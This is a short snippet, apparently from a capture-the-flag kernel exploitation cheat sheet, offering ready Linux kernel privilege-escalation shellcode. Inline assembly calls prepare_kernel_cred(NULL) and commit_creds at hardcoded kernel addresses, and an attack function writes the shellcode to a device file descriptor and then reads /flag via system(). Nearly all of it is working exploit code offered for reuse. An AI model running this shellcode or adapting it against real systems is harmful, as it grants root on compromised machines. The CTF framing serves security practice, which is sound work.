We rarely get working shellcode, as those types of challenges are rare, but if you meet one, here's a ready Privilege Escalation that uses commit_creds(prepare_kernel_cred(NULL)):
uint64_t commit_creds = 0xffffffff81089310;
uint64_t prepare_kernel_cred = 0xffffffff81089660;
__attribute__((naked)) void shellcode(){
__asm__(
".intel_syntax noprefix\n"
"movabs rax, prepare_kernel_cred\n" // prepare_kernel_cred
"xor rdi, rdi\n"
"call rax\n"
"mov rdi, rax\n"
"movabs rax, commit_creds\n" // commit_creds
"call rax\n"
"ret\n" // return after shellcode's call
".att_syntax\n"
);
}
void attack(int fd){
write(fd, shellcode, 0x100); // some random, big-enough size
system("cat /flag\n");
return;
}